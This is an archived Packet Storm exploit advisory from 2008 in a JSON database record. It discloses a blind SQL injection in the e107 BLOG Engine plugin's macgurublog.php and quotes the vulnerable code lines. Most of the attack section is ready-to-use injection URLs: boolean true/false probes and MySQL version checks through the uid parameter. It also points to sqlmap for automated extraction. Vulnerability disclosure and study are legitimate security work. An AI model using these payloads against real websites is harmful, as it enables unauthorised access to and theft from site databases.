ID PACKETSTORM:66623 Type packetstorm Reporter hadihadi Modified 2008-05-23T00:00:00
Description
`
##################################################################################################
# #
# ::e107 Plugin BLOG Engine v2.2 (macgurublog.php/uid) Blind SQL Injection Vulnerability:: #
# #
##################################################################################################
Virangar Security Team
www.virangar.net
--------
Discoverd By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-------vuln codes in:-----------
macgurublog.php:
line 18:$buid = $_GET['uid'];
..
..
line 31:$sql -> db_Select("user", "user_name", "user_id=".$buid);
---
exploit:
[-]note=becuse e107 using diffrent prefix/table names it's impossible to writting exploit for it :(
http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and 2>1/* #the page fully loaded
http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and 1>3/* #page loaded whit any data and some error that say "The user has hidden their blog."
cheking the mysql version:
http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and substring(@@version,1,1)=5
or
http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and substring(@@version,1,1)=4
# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...
---
young iranian h4ck3rz
`
{"id": "PACKETSTORM:66623", "type": "packetstorm", "bulletinFamily": "exploit", "title": "e107blog-sql.txt", "description": "", "published": "2008-05-23T00:00:00", "modified": "2008-05-23T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/66623/e107blog-sql.txt.html", "reporter": "hadihadi", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:21:51", "viewCount": 1, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2016-11-03T10:21:51", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:21:51", "rev": 2}, "vulnersScore": -0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/66623/e107blog-sql.txt", "sourceData": "` \n \n################################################################################################## \n# # \n# ::e107 Plugin BLOG Engine v2.2 (macgurublog.php/uid) Blind SQL Injection Vulnerability:: # \n# # \n################################################################################################## \n \nVirangar Security Team \n \nwww.virangar.net \n \n-------- \nDiscoverd By :virangar security team(hadihadi) \n \nspecial tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra \n \n& all virangar members & all hackerz \n \ngreetz:to my best friend in the world hadi_aryaie2004 \n& my lovely friend arash(imm02tal) \n \n-------vuln codes in:----------- \nmacgurublog.php: \nline 18:$buid = $_GET['uid']; \n.. \n.. \nline 31:$sql -> db_Select(\"user\", \"user_name\", \"user_id=\".$buid); \n--- \nexploit: \n[-]note=becuse e107 using diffrent prefix/table names it's impossible to writting exploit for it :( \n \nhttp://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and 2>1/* #the page fully loaded \n \nhttp://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and 1>3/* #page loaded whit any data and some error that say \"The user has hidden their blog.\" \n \ncheking the mysql version: \nhttp://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and substring(@@version,1,1)=5 \nor \nhttp://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and substring(@@version,1,1)=4 \n \n# you can exploting the bug white blind sql automatic toolz such as sqlmap or ... \n--- \nyoung iranian h4ck3rz \n`\n"}